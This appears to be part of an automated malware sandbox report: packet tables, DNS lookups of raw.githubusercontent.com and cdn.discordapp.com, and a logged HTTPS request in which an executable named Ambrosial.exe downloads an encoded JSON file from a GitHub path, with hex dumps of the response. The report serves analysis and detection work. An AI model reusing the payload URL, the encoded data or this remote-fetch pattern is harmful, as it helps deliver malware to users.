                                                                                                                                                                                      Oct 30, 2021 13:52:26.450930119 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.450948000 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.450964928 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451004982 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451033115 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451054096 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451073885 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451086044 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451113939 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451145887 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451174974 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451191902 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451211929 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451224089 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451256990 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451286077 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451317072 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451338053 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451349974 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451350927 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451364040 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451410055 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451436996 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451461077 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451472998 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451477051 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451483965 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451529026 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451534033 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451545000 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451594114 CEST44349773162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:26.451646090 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:26.461430073 CEST49773443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.429721117 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.429800987 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.431549072 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.432033062 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.432060957 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.471240997 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.478135109 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.478194952 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527621984 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527724028 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527775049 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527817965 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527857065 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527895927 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527895927 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527920961 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527944088 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527960062 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.527991056 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528023958 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528055906 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528069019 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528075933 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528106928 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528126001 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528131962 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528163910 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528179884 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528184891 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528213978 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528233051 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528238058 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528268099 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528286934 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528291941 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528346062 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528353930 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528358936 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528400898 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528414965 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528422117 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528455019 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528481007 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528484106 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528493881 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528542995 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528553963 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528562069 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528584957 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528600931 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528631926 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528685093 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.528687954 CEST44349790162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:29.531089067 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:29.538403988 CEST49790443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.044395924 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.044464111 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.044615984 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.045293093 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.045320034 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.083395004 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.086106062 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.128870964 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.134812117 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135576963 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135617018 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135643959 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135674000 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135693073 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135704994 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135715961 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135730982 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135761023 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135775089 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135822058 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.135968924 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136187077 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136215925 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136244059 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136245966 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136259079 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136280060 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136296034 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136332989 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136344910 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136356115 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136387110 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136415005 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136418104 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136429071 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136454105 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136478901 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136506081 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136534929 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136550903 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136562109 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136590004 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136594057 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136625051 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136641026 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136651039 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136683941 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136701107 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136709929 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136742115 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136763096 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136773109 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136805058 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136826038 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136836052 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136881113 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136894941 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136907101 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136939049 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136954069 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136965990 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.136997938 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137012959 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137022972 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137053967 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137074947 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137083054 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137119055 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137135029 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137145042 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137156963 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137206078 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.137214899 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.151953936 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.152029991 CEST44349803162.159.133.233192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:41.152107000 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.152153969 CEST49803443192.168.2.3162.159.133.233
                                                                                                                                                                                      Oct 30, 2021 13:52:41.153357029 CEST49803443192.168.2.3162.159.133.233

                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Oct 30, 2021 13:51:35.964565039 CEST5804553192.168.2.38.8.8.8
                                                                                                                                                                                      Oct 30, 2021 13:51:35.983496904 CEST53580458.8.8.8192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:52:03.425791025 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                      Oct 30, 2021 13:52:03.446902990 CEST53528068.8.8.8192.168.2.3

                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                      Oct 30, 2021 13:51:35.964565039 CEST192.168.2.38.8.8.80x66b3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:52:03.425791025 CEST192.168.2.38.8.8.80xdbccStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                      Oct 30, 2021 13:51:35.983496904 CEST8.8.8.8192.168.2.30x66b3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:51:35.983496904 CEST8.8.8.8192.168.2.30x66b3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:51:35.983496904 CEST8.8.8.8192.168.2.30x66b3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:51:35.983496904 CEST8.8.8.8192.168.2.30x66b3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:51:49.994713068 CEST8.8.8.8192.168.2.30xfd4dNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:52:03.446902990 CEST8.8.8.8192.168.2.30xdbccNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:52:03.446902990 CEST8.8.8.8192.168.2.30xdbccNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:52:03.446902990 CEST8.8.8.8192.168.2.30xdbccNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:52:03.446902990 CEST8.8.8.8192.168.2.30xdbccNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Oct 30, 2021 13:52:03.446902990 CEST8.8.8.8192.168.2.30xdbccNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)

                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                      • raw.githubusercontent.com
                                                                                                                                                                                      • cdn.discordapp.com

                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      0192.168.2.349741185.199.108.133443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:51:36 UTC0OUTGET /disepi/ambrosial/main/cachedclients.json HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2021-10-30 11:51:36 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 9177
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                      ETag: "b73e61c048177e6100edd057ccc9bc210cfbebad08e902e11397725130a4c078"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: C188:CB26:9A12A9:A6C643:617D1DCD
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:51:36 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6972-MXP
                                                                                                                                                                                      X-Cache: MISS
                                                                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                                                                      X-Timer: S1635594697.767507,VS0,VE142
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: 5fd36e733523af4758e1285f959e82dfdcdf7bdd
                                                                                                                                                                                      Expires: Sat, 30 Oct 2021 11:56:36 GMT
                                                                                                                                                                                      Source-Age: 0
                                                                                                                                                                                      2021-10-30 11:51:36 UTC0INData Raw: 61 6d 56 55 5a 45 46 54 4e 44 6c 7a 4e 6d 70 51 5a 33 6c 77 56 46 56 77 54 56 70 47 62 33 56 55 62 48 46 4a 63 55 51 77 4d 6b 5a 68 56 56 64 4d 63 54 4e 79 53 6d 74 76 56 6d 6f 76 63 46 46 47 63 58 68 55 51 30 78 50 4f 53 39 55 56 30 46 36 4e 45 78 45 62 6c 45 35 4d 58 52 36 4e 33 70 4a 51 30 68 51 59 32 68 52 5a 6b 39 6a 54 6c 56 45 4e 45 35 4b 55 55 4a 4a 56 48 64 6d 52 55 56 57 4e 32 74 4b 62 6e 67 30 63 7a 46 61 53 43 74 72 59 6b 6c 6d 54 55 39 55 62 6c 56 4d 54 44 52 46 57 6c 6b 31 52 6b 39 6d 52 45 52 44 59 6c 4e 72 4f 57 78 70 54 57 35 5a 5a 55 6c 78 51 6b 39 58 62 6d 6f 7a 62 45 31 71 4d 58 70 6b 57 54 4a 56 52 6d 6c 6a 4f 55 31 32 64 69 39 4e 64 47 34 77 64 57 45 78 4f 45 38 35 4e 44 42 69 52 58 4d 32 4e 44 51 77 5a 44 64 76 52 57 6c 58 56 30 64
                                                                                                                                                                                      Data Ascii: amVUZEFTNDlzNmpQZ3lwVFVwTVpGb3VUbHFJcUQwMkZhVVdMcTNySmtvVmovcFFGcXhUQ0xPOS9UV0F6NExEblE5MXR6N3pJQ0hQY2hRZk9jTlVENE5KUUJJVHdmRUVWN2tKbng0czFaSCtrYklmTU9UblVMTDRFWlk1Rk9mRERDYlNrOWxpTW5ZZUlxQk9XbmozbE1qMXpkWTJVRmljOU12di9NdG4wdWExOE85NDBiRXM2NDQwZDdvRWlXV0d
                                                                                                                                                                                      2021-10-30 11:51:36 UTC2INData Raw: 64 61 64 53 74 4a 65 6c 70 59 56 54 64 58 4f 56 5a 6e 65 55 5a 6d 4b 30 5a 47 62 7a 6b 79 56 30 6f 31 4c 31 59 30 52 46 45 35 53 7a 5a 6e 5a 44 6c 47 59 58 4d 35 55 30 59 7a 61 45 49 32 55 58 70 48 56 48 56 48 52 57 4e 6e 5a 6e 42 45 4e 6b 39 4a 61 45 51 31 65 6c 46 31 55 6c 52 70 51 6d 45 32 61 54 45 76 54 58 5a 77 61 32 46 46 53 54 56 55 57 6c 52 50 62 32 4a 31 51 6e 5a 35 62 6b 35 77 64 32 77 35 51 55 4d 72 4d 58 56 74 4d 45 6c 76 4d 6e 59 30 57 48 64 42 54 33 4e 7a 54 6e 6f 32 56 6e 52 71 65 45 74 59 63 6b 38 31 63 33 46 35 62 6c 4e 42 64 79 74 73 55 58 5a 33 4e 6c 42 36 55 6b 78 76 64 33 42 45 61 6e 63 78 5a 53 39 6e 63 6d 38 76 4c 30 5a 32 54 32 74 36 61 48 6f 30 4e 7a 46 36 52 55 34 77 4f 47 4e 74 52 55 35 70 4d 6b 64 57 5a 54 56 4a 64 6a 64 6b 51
                                                                                                                                                                                      Data Ascii: dadStJelpYVTdXOVZneUZmK0ZGbzkyV0o1L1Y0RFE5SzZnZDlGYXM5U0YzaEI2UXpHVHVHRWNnZnBENk9JaEQ1elF1UlRpQmE2aTEvTXZwa2FFSTVUWlRPb2J1QnZ5bk5wd2w5QUMrMXVtMElvMnY0WHdBT3NzTno2VnRqeEtYck81c3F5blNBdytsUXZ3NlB6Ukxvd3BEancxZS9ncm8vL0Z2T2t6aHo0NzF6RU4wOGNtRU5pMkdWZTVJdjdkQ
                                                                                                                                                                                      2021-10-30 11:51:36 UTC3INData Raw: 4e 46 4e 4e 52 6d 39 31 53 48 46 6e 4f 57 5a 44 53 30 6f 76 62 7a 56 6f 52 44 4e 44 51 33 46 4d 4d 48 55 32 4e 55 6c 71 56 6d 59 72 59 32 5a 4b 61 45 5a 4b 63 55 31 76 4e 45 6f 76 64 6e 56 48 5a 55 70 73 4d 56 59 76 62 31 42 6b 51 54 51 72 53 44 6c 6a 53 31 6c 45 63 6c 42 68 62 46 64 6f 53 44 55 32 51 56 42 6f 4c 30 64 45 59 7a 42 54 4b 30 4a 52 62 31 51 30 64 46 46 54 5a 47 35 34 53 57 6c 31 59 32 64 5a 5a 47 39 52 64 56 56 49 65 45 34 31 51 7a 42 73 52 32 78 7a 51 6a 52 4b 64 6c 5a 44 65 45 4d 32 61 58 4a 30 55 30 64 34 5a 7a 4a 59 57 54 4a 4d 64 6e 4e 48 63 58 55 32 4d 32 31 74 4f 53 73 30 65 6c 4e 5a 62 45 74 75 4e 56 4e 31 57 58 56 4f 53 32 4a 59 62 6e 6c 4f 64 44 64 75 4d 6a 56 49 54 33 42 5a 64 6c 6c 79 65 48 5a 4c 57 57 70 33 62 30 78 42 61 57 63
                                                                                                                                                                                      Data Ascii: NFNNRm91SHFnOWZDS0ovbzVoRDNDQ3FMMHU2NUlqVmYrY2ZKaEZKcU1vNEovdnVHZUpsMVYvb1BkQTQrSDljS1lEclBhbFdoSDU2QVBoL0dEYzBTK0JRb1Q0dFFTZG54SWl1Y2dZZG9RdVVIeE41QzBsR2xzQjRKdlZDeEM2aXJ0U0d4ZzJYWTJMdnNHcXU2M21tOSs0elNZbEtuNVN1WXVOS2JYbnlOdDduMjVIT3BZdllyeHZLWWp3b0xBaWc
                                                                                                                                                                                      2021-10-30 11:51:36 UTC4INData Raw: 46 6f 54 6d 4a 55 5a 56 42 55 63 48 56 72 64 55 4a 6e 56 30 77 7a 62 32 5a 31 4d 69 74 47 59 58 41 32 57 6b 46 59 55 46 4e 57 55 31 52 31 53 57 64 33 5a 44 52 6f 63 7a 52 4a 56 47 35 33 54 44 56 6f 54 56 49 32 63 57 64 75 61 55 78 51 4e 6b 52 4b 53 58 4e 58 53 31 46 54 62 53 74 57 53 7a 4a 57 4d 31 4a 32 65 45 46 49 53 6d 39 43 64 30 70 68 59 6b 70 71 5a 56 64 78 52 6b 77 7a 65 55 64 46 55 32 39 6b 52 6d 31 44 52 44 6c 30 63 46 4e 56 61 47 4e 72 54 56 68 6c 52 54 4d 35 55 47 52 72 65 6c 56 6b 64 30 6c 4d 62 30 78 42 4d 6c 70 42 4d 48 4e 4e 56 6b 4e 59 54 47 6c 44 64 58 6c 49 64 58 4e 45 62 48 6b 30 51 7a 4e 53 54 33 6b 7a 4f 47 74 51 62 46 5a 31 55 45 30 7a 59 58 52 6c 65 6a 52 69 64 48 5a 6b 5a 32 35 6f 62 58 64 49 4c 32 46 46 4d 6b 64 36 54 45 5a 4c 57
                                                                                                                                                                                      Data Ascii: FoTmJUZVBUcHVrdUJnV0wzb2Z1MitGYXA2WkFYUFNWU1R1SWd3ZDRoczRJVG53TDVoTVI2cWduaUxQNkRKSXNXS1FTbStWSzJWM1J2eEFISm9Cd0phYkpqZVdxRkwzeUdFU29kRm1DRDl0cFNVaGNrTVhlRTM5UGRrelVkd0lMb0xBMlpBMHNNVkNYTGlDdXlIdXNEbHk0QzNST3kzOGtQbFZ1UE0zYXRlejRidHZkZ25obXdIL2FFMkd6TEZLW
